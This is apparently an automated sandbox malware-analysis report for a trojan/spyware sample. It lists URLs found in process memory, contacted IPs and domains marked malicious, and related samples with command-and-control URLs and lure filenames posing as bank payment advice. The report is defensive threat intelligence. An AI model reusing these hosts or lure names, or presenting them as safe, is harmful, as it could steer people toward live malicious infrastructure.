                                                                  http://schemas.microso~mexplorer.exe, 0000001D.00000000.1678287639.000000000FE9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1606627275.000000000FE9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1478136479.000000000FE9D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  low
                                                                  http://www.pinwheeleffect.org/Best_Penny_Stocks.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWxRKhelp.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://i3.cdn-image.com/__media__/pics/7985/netsol-logos.jpghelp.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.nic.ru/help/oshibka-404_8500.htmlhelp.exe, 00000013.00000002.5838813103.0000000005632000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    high
                                                                    http://xn--299aa717y.xn--3e0b707ehelp.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrantexplorer.exe, 0000001D.00000000.1578203859.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1719526997.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1646036083.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1437337668.0000000005400000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://repository.certum.pl/ctsca2021.cer0Jjfmcz1Hsz.exefalse
                                                                        high
                                                                        https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=help.exe, 00000013.00000003.1932954481.0000000007E11000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1928937350.0000000007DBB000.00000004.00000800.00020000.00000000.sdmp, 231-EqK-.19.drfalse
                                                                          high
                                                                          https://drive.google.com/Jjfmcz1Hsz.exe, 0000000B.00000002.1324658870.00000000017E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://word.office.comyexplorer.exe, 0000001D.00000000.1479232269.000000000FF1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1607377108.000000000FF1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1678904598.000000000FF1B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://customersupport.networksolutions.com/article.php?id=306help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              high
                                                                              http://i3.cdn-image.com/__media__/pics/8934/frt_arr.jpg)help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://wns.windows.com/explorer.exe, 0000001D.00000000.1483111483.000000001009F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1680933547.000000001009F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1609653243.000000001009F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.Pinwheeleffect.orghelp.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.certum.pl/CPS0Jjfmcz1Hsz.exefalse
                                                                                  high
                                                                                  https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgexplorer.exe, 0000001D.00000000.1578203859.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1719526997.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1646036083.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1437337668.0000000005400000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://yastatic.net/pcode/adfox/loader.jshelp.exe, 00000013.00000002.5838813103.0000000005632000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filminexplorer.exe, 0000001D.00000000.1578203859.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1719526997.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1646036083.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1437337668.0000000005400000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://crl.certum.pl/ctnca.crl0kJjfmcz1Hsz.exefalse
                                                                                          high
                                                                                          http://i3.cdn-image.com/__media__/pics/8934/srch-bg.gif)help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://xn--299aa717y.xn--3e0b707e/feed/help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://xn--299aa717y.xn--3e0b707e/comments/feed/help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/explorer.exe, 0000001D.00000000.1578203859.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1719526997.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1646036083.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1437337668.0000000005400000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.pinwheeleffect.org/Health_Insurance.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWxRKRhelp.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://www.pinwheeleffect.org/Migraine_Pain_Relief.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWhelp.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=help.exe, 00000013.00000003.1928937350.0000000007DBB000.00000004.00000800.00020000.00000000.sdmp, 231-EqK-.19.drfalse
                                                                                              high
                                                                                              https://ww.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmingexplorer.exe, 0000001D.00000000.1578203859.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1719526997.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1646036083.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1437337668.0000000005400000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://nsis.sf.net/NSIS_ErrorErrorJjfmcz1Hsz.exefalse
                                                                                                  high
                                                                                                  http://www.pinwheeleffect.org/Best_Mortgage_Rates.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWxhelp.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://i3.cdn-image.com/__media__/pics/8934/rcomlogo.jpghelp.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://outlook.comexplorer.exe, 0000001D.00000000.1734878004.000000000D05C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1660900795.000000000D05C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1590839096.000000000D05C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1455985675.000000000D05C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&oexplorer.exe, 0000001D.00000000.1578203859.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1719526997.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1646036083.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1437337668.0000000005400000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://xn--299aa717y.xn--3e0b707e/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://nsis.sf.net/NSIS_ErrorJjfmcz1Hsz.exefalse
                                                                                                        high
                                                                                                        https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-alexplorer.exe, 0000001D.00000000.1578203859.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1719526997.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1646036083.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1437337668.0000000005400000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://android.notify.windows.com/iOSexplorer.exe, 0000001D.00000000.1478136479.000000000FE9D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 0000001D.00000000.1483111483.000000001009F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1680933547.000000001009F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1609653243.000000001009F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.register.com?trkID=WSTm3u15CWhelp.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.pinwheeleffect.org/Parental_Control.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWxRKRhelp.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.pinwheeleffect.org/Accident_Lawyers.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWxRKRhelp.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.pinwheeleffect.org/High_Speed_Internet.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWxhelp.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.pinwheeleffect.org/music_videos.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWxRKRoC9fhelp.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://api.msn.com/#explorer.exe, 0000001D.00000000.1566141100.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1707044735.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1423308088.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1634292873.0000000000D73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000001D.00000000.1650696927.0000000009848000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1582853419.0000000009848000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1724750579.0000000009848000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1444672750.0000000009848000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://xn--299aa717y.xn--3e0b707e/wp-content/themes/twentytwentytwo/style.css?ver=1.3help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://crl.certum.pl/ctsca2021.crl0oJjfmcz1Hsz.exefalse
                                                                                                                      high
                                                                                                                      https://dts.gnpge.comhelp.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://windows.msn.com/shellexplorer.exe, 0000001D.00000000.1666507279.000000000D37E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1739864763.000000000D37E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://i3.cdn-image.com/__media__/pics/8932/arrows.jpg)help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://doc-0g-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/41p6p8b8Jjfmcz1Hsz.exe, 0000000B.00000003.1182355015.000000000182F000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1171500382.0000000001832000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1181941990.0000000001819000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1181384461.000000000182F000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1171881255.0000000001871000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1324345210.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1177181129.0000000001832000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1325265421.0000000001832000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1177142759.000000000182F000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1325068211.0000000001819000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://wordpress.orghelp.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://xn--299aa717y.xn--3e0b707e/help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://support.google.com/chrome/?p=plugin_flashhelp.exe, 00000013.00000002.5841740291.0000000007D98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.register.com/whois.rcmx?domainName=Pinwheeleffect.orghelp.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.pinwheeleffect.org/px.js?ch=2help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://sedo.com/search/details/?partnerid=324561&language=d&domain=popular.directory&origin=sales_lhelp.exe, 00000013.00000002.5837586951.0000000004FEA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.pinwheeleffect.org/px.js?ch=1help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://push.zhanzhang.baidu.com/push.jshelp.exe, 00000013.00000002.5836975372.0000000004B34000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.microexplorer.exe, 0000001D.00000000.1586221524.000000000A730000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.1638822548.0000000003230000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.1449715301.000000000AFB0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.pinwheeleffect.org/display.cfmhelp.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs
                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    154.204.24.45
                                                                                                                                    www.youlian.fundSeychelles
                                                                                                                                    136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                                                                                                    192.185.32.157
                                                                                                                                    royaltechglobal.comUnited States
                                                                                                                                    46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                    194.245.148.189
                                                                                                                                    www.apidachicago.orgGermany
                                                                                                                                    5517CSLDEtrue
                                                                                                                                    208.91.197.39
                                                                                                                                    www.pinwheeleffect.orgVirgin Islands (BRITISH)
                                                                                                                                    40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                                    192.232.217.125
                                                                                                                                    wellnessprodia.comUnited States
                                                                                                                                    46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                    64.190.63.111
                                                                                                                                    www.popular.directoryUnited States
                                                                                                                                    11696NBS11696UStrue
                                                                                                                                    103.91.8.90
                                                                                                                                    www.t1fbrc.comHong Kong
                                                                                                                                    45753NETSEC-HKNETSECHKtrue
                                                                                                                                    172.217.23.110
                                                                                                                                    drive.google.comUnited States
                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                    66.29.151.40
                                                                                                                                    www.gouldent.siteUnited States
                                                                                                                                    19538ADVANTAGECOMUStrue
                                                                                                                                    38.55.15.214
                                                                                                                                    www.xiaoxiuzhen.comUnited States
                                                                                                                                    174COGENT-174UStrue
                                                                                                                                    45.130.41.24
                                                                                                                                    www.searchbot.suRussian Federation
                                                                                                                                    198610BEGET-ASRUtrue
                                                                                                                                    185.101.158.239
                                                                                                                                    www.funknive.chSwitzerland
                                                                                                                                    207143HOSTTECH-ASCHtrue
                                                                                                                                    142.250.184.225
                                                                                                                                    googlehosted.l.googleusercontent.comUnited States
                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                    75.2.81.212
                                                                                                                                    www.gumba.shopUnited States
                                                                                                                                    16509AMAZON-02UStrue
                                                                                                                                    50.87.192.144
                                                                                                                                    xn--29-oj9ik7b890b.netUnited States
                                                                                                                                    46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                    2.57.90.16
                                                                                                                                    botbillionsblaze.websiteLithuania
                                                                                                                                    47583AS-HOSTINGERLTtrue
                                                                                                                                    103.63.2.175
                                                                                                                                    www.005404.comHong Kong
                                                                                                                                    132742GGL-AS-APGuochaoGrouplimitedHKtrue
                                                                                                                                    198.58.118.167
                                                                                                                                    www.labour-office.comUnited States
                                                                                                                                    63949LINODE-APLinodeLLCUStrue
                                                                                                                                    195.24.68.23
                                                                                                                                    www.phootka.ruRussian Federation
                                                                                                                                    48287RU-CENTERRUtrue
                                                                                                                                    Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                    Analysis ID:760810
                                                                                                                                    Start date and time:2022-12-05 15:08:10 +01:00
                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 20m 16s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Sample file name:Jjfmcz1Hsz.exe
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                    Run name:Suspected Instruction Hammering
                                                                                                                                    Number of analysed new started processes analysed:33
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:2
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • HDC enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@6/6@22/19
                                                                                                                                    EGA Information:
                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                    HDC Information:
                                                                                                                                    • Successful, ratio: 76.6% (good quality ratio 69.8%)
                                                                                                                                    • Quality average: 74.9%
                                                                                                                                    • Quality standard deviation: 30.8%
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 98%
                                                                                                                                    • Number of executed functions: 131
                                                                                                                                    • Number of non-executed functions: 93
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 40.77.2.164, 52.152.108.96
                                                                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wdcp.microsoft.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, fe3.delivery.mp.microsoft.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net
                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                    No simulations
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    154.204.24.45Lakeringernes (1).exeGet hashmaliciousBrowse
                                                                                                                                    • www.youlian.fund/i036/?k0GP1N2=LMIqSMdQ3q0mQ0O8E4Be7P+zrPM6Gg4aprrhhSoZXI8N9fokAeXZtK7CAx7jxtppbBVDda4uu0E3KjN/+XSSDpZJ6husVXmnlg==&Rzu=hV1Pon
                                                                                                                                    Aposporogony.exeGet hashmaliciousBrowse
                                                                                                                                    • www.youlian.fund/nqhc/?r4txB=MkuUvDTfzFLprDgv0d/zCzEj80YoaBEagpxYPCZUDQ8arMBq5slv03vCCvkVDe0A6/c8Ceh5Akj/CnOQLB+qucpYk5Fxn1TZTg==&1b=S8jD
                                                                                                                                    Tudbrlet.exeGet hashmaliciousBrowse
                                                                                                                                    • www.youlian.fund/nqhc/?qVnHaF=1bbXu4zHEnq0&7no4=MkuUvDTfzFLprDgv0d/zCzEj80YoaBEagpxYPCZUDQ8arMBq5slv03vCCvkVDe0A6/c8Ceh5Akj/CnOQLB+qucpYk5Fxn1TZTg==
                                                                                                                                    192.185.32.157Aposporogony.exeGet hashmaliciousBrowse
                                                                                                                                    • www.royaltechglobal.com/nqhc/?r4txB=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&1b=S8jD
                                                                                                                                    Tudbrlet.exeGet hashmaliciousBrowse
                                                                                                                                    • www.royaltechglobal.com/nqhc/?7no4=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&qVnHaF=1bbXu4zHEnq0
                                                                                                                                    Trubaduren.exeGet hashmaliciousBrowse
                                                                                                                                    • www.royaltechglobal.com/nqhc/?9rG=4h9DYRixlTZd&yDH=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==
                                                                                                                                    Buffone.exeGet hashmaliciousBrowse
                                                                                                                                    • www.royaltechglobal.com/ma6v/?dTVt1=FRvD&tFNx=02Bl+cWfDlBZkMWEaX3krzisSzoQcLPhqMMIqiW9WqGr0h3YO475jCxhTV2goziKF+Syp7Sv7uWbMFLP8pdTjzRLXH/ArU/oUQ==
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    www.phootka.ruAposporogony.exeGet hashmaliciousBrowse
                                                                                                                                    • 195.24.68.23
                                                                                                                                    Scan AR441 SHEETS.exeGet hashmaliciousBrowse
                                                                                                                                    • 195.24.68.23
                                                                                                                                    xLd3hdhrqJ.exeGet hashmaliciousBrowse
                                                                                                                                    • 195.24.68.23
                                                                                                                                    HSBC Payment Advice_pdf.exeGet hashmaliciousBrowse
                                                                                                                                    • 195.24.68.23
                                                                                                                                    Tudbrlet.exeGet hashmaliciousBrowse
                                                                                                                                    • 195.24.68.23
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 195.24.68.23
                                                                                                                                    Trubaduren.exeGet hashmaliciousBrowse
                                                                                                                                    • 195.24.68.23
                                                                                                                                    SCAN AWB Docs No-285380XXX.exeGet hashmaliciousBrowse
                                                                                                                                    • 195.24.68.23
                                                                                                                                    HSBC Advice_pdf.exeGet hashmaliciousBrowse
                                                                                                                                    • 195.24.68.23
                                                                                                                                    HSBC Adivce_pdf.exeGet hashmaliciousBrowse
                                                                                                                                    • 195.24.68.23
                                                                                                                                    HSBC Advice_pdf.exeGet hashmaliciousBrowse
                                                                                                                                    • 195.24.68.23
                                                                                                                                    DOC Reference Invoice_72_1421 Note.exeGet hashmaliciousBrowse
